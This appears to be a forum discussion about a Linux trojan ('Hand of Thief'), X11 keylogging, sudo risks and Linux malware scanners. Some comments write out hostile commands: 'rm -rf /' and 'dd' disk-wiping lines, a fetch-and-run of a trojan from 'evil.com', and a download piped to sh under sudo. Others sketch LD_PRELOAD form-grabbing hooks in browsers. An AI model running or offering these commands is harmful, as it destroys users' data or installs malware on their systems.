Once you have the ability to run code on a system (as someone dropping this trojan would), all bets are off. This has nothing to do with "security" and it's quite misleading to say that it does. I'm no fan of Linux from a security perspective, but this story has no impact on the security posture of a Linux system, period.
Privilege escalation bugs are getting rarer.
If Ubuntu put the browser in a LXC etc things could move forward.
Bets not off! We should carry on trying!
(Question for those in the know: what exactly does it prevent firefox from doing?)
Usually the design of an O.S. has certain weight, but not half of the weight that the operators (and users) have.
A keylogger for linux takes less than 30 lines of C... a payload for a root shell takes less... but to certify that they will work on every Linux out there... is more hard... it's hard even with constructive software, it shouldn't be less hard with malware.
The concept of malware may vary too much from one person to other, from one company to other, from one project to other.
It's not always a trojan, and software is a changing scenario. And it's not isolated, it's an ecosystem.
First viruses did travel on floppy disks. Nowadays they use websockets, sql, or render themselves as a (web) image or font.
Even the low latency 184.108.40.206 DNS, maybe considered malware if we go philosophical.
Internet, as the real world, is something wonderful. And as the real world, may turn hostile. So even if wonderful, each one should take care on what to trust, and what not, and how.
Update: remove all "quoting" as I was told once that I use them too much.
What OS's are you a fan of from a security perspective?
According to http://www.techrepublic.com/blog/linux-and-open-source/hand-...
The good news is that Hand of Thief must have the root
(or sudo) password in order to install.
Hello there. I'm the unix virus. Please sudo run me.
There's the XACE (X11 Access Control Extension) that tries to make it harder to snoop, but I don't believe that it's enabled by default in most distributions.
KeyPress event, serial 28, synthetic NO, window 0x2000003,
root 0x2b7, subw 0x0, time 322414662, (225,283), root:(1057,269),
state 0x0, keycode 26 (keysym 0x65, e), same_screen YES,
XLookupString gives 1 bytes: (65) "e"
XmbLookupString gives 1 bytes: (65) "e"
XFilterEvent returns: False
Writing a keylogger for X Window is just a few lines of shell script, assuming `xinput` is installed. X Window system just was not designed for running complex graphical environments, I suppose, and security inside it is quite weak (it does not protect root sessions in xterm in any way although xterm was one of the first X programs). Yes, `gksu`/`kdesudo` alleviate the situation (protecting passwords from being grabbed), but that's not a solution.
E.g. it's easy to write a script that detects user's inactivity for some period and if a root session is here in the same X session, it just sends there any text. That's why I avoid sudo'ing in graphical environment and I always set 'targetpw' in /etc/sudoers to enable separate root account on Debian/Ubuntu.
What now? When did anyone ever claim Linux was "absolutely secure"? Second, how is an attack that depends on the user installing malicious software evidence of a security lapse in the system itself? If you're just going to run anything I tell you to run, I'll give you:
sudo rm -rf /
sudo rm -rf --no-preserve-root /
Regardless, everyone knows that sudo rm -rf / is a bad idea, try using something more cryptic. I reccomend:
sudo dd if=/dev/zero of=/dev/sda
For those of you thinking "but surely sda is mounted, Linux won't let you write to it", wrong. I just tested this on my machine (using a specially made loop-back device). You can write directly to a mounted device. For those curius, after zero'ing out the device, attempting to 'ls' in the mounted directory resulted in either ls printing "killed" and terminating instantly, or hanging and refusing to respond to ^C.
When you target Windoze you can write a .exe file and convince your victim to execute it. What type of file would you use to attack Linux users? If they use RPM, you could use a .RPM file. If they use Debian or Ubuntu, you could provide a .deb file. If you are attempting to send your virus to every email address in the victim's address book, you would need to know the package manager of the victim before deciding which attack package to distribute. Certainly, you could distribute the package as a script which determines the OS then grabs the appropriate package from a repository and installs it, but then you're exposing a lot of information about your attack to every victim. Eventually someone catches it.
So no Linux is not immune to viruses, but it's more the platform than the audience that prevents these attacks. When you want to attack Linux users, use a rootkit instead. Actually... please don't attack Linux users, there are enough Windoze users out there, and you shouldn't attack them either... because... ethics
I can guarantee you that most malware authors run Windows. It's terribly difficult to cross compile software on a *NIX for a Windows environment, and even more difficult to test and debug said software if you don't have a runtime for the given executable.
Linux hasn't ever been a major malware target (in the Windows sense of malware) because the consumer install base for a desktop system has always been extremely low. That said, look at how many times a Linux web server gets compromised through the application it's running (RCE, SQLi, etc), and the possible value of the data lost through those methods and you'll see that there isn't a need for researching exploits and developing malware for those targets, as we the web application developers, design those exploits for them.
$ wget evil.com/trojan
$ chmod +x trojan
sudo wget http://example.com/node/install.sh | sh
After downloading it asks for your password.
Although presumably someone who could write there could just corrupt a package everyone already has?
You trick people to install/run something. Mail with attachments, perhaps there's a vulnerability in a pdf reader, openoffice, some media player to exploit perhaps the user will actually run that executable you sent. Download links with added malware. Drop a custom usb key and exploit the USB stack.
if [[ $(ps -eaf|grep "\[flush" | tr -s " " |cut -d" " -f 3|grep ^1$) ]]; then echo "Infection suspected"; else echo "No infection suspected"; fi
For Firefox, I know about PR_Write (There's some information for how to form grab Firefox under Windows which I found applicable). Since PR_Write function is in a shared library, you can use LD_PRELOAD to get Firefox to call your custom form-grabbing PR_Write, which can then call the original one.
Not trying to do anything malicious - just genuinely curious.
You find the function you are interested in in Chromes code base, then look for it in the compiled binary or library its located in (with debug symbols, usually). You build a pattern from the functions code bytes. You then inject your evil library into the target process (also through LD_PRELOAD, but there are tons of ways) and have it search in the process memory for the function from the bytes you acquired previously. You temporarily change the page protections and overwrite the first few bytes of the target function to instead jump directly into your code.
You have to be careful with calling conventions or you will corrupt the stack, and often you want to preserve the original bytes of the function such that you can call into it from your replacement function.
This is what is called a hook, or a detour. Microsoft even has a library for this that does all of the previous in a neat package (http://research.microsoft.com/en-us/projects/detours/), but the basic redirection is very simple.
What would be the performance implications of running everything under a virtual machine on a very light host OS? The idea had not previously occurred to me, but it seems like there would be a ton of advantages to that, including increased security.
I know that some compatibility issues will vary depending on VM software, but from a pure performance perspective, what kind of loss are we looking at?
I had a quick look at http://www.clamav.net/ but it seems to target mainly windows stuff attached to mails and from some comments on the net isn't that reliable at detecting known malicous stuff ...
There is however, a fuse FS ClamFS http://clamfs.sourceforge.net/ that provides on access scanning for Linux with ClamAV. I have no idea how much overhead that incurs, but it probably isn't a small amount. A lot of enterprise offerings provide on access scanning (McAfee, F-Prot, Kaspersky, and more).
I'd imagine there are Firefox and Chrome add ons as well.
 - http://www.rfxn.com/projects/linux-malware-detect/